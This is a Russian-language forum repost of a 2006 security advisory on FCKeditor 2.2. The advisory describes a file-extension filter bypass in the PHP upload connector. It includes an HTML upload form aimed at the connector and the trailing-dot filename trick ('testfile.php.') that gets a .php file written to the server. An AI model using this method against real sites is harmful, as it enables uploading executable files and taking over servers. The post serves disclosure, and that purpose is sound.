Уязвимость в FCKeditor 2.2

Уязвимость в FCKeditor 2.2

27.02.2006, 13:50

censored!

Green member - Level 3

Регистрация: 02.11.2004

Сообщений: 1,337

С нами: 11325926

Репутация: 648

Уязвимость в FCKeditor 2.2

Что-то новость прошла незамеченной...

Исследование: NSA Group
Продукт: FCKeditor 2.2
Сайт производителя: http://www.fckeditor.net

Описание:
Возможен обход фильтрации расширений файлов.

Воздействие:
Загрузка запрещённых файлов на целевую систему.

Риск: высокий

Пример:

Код:

<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data"> 
File Upload:
<input id="txtFileUpload" type="file" name="NewFile"> 
<input type="submit" value="Upload"> 
</form>

В конце имени загружаемого файла поставеть символ "." (пример: testfile.php.)

В результате на сервере будет создан файл testfile.php

Решение:
Обратиться на сайт производителя http://www.fckeditor.net
---
Источник: http://www.nsag.ru/vuln/893.html

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•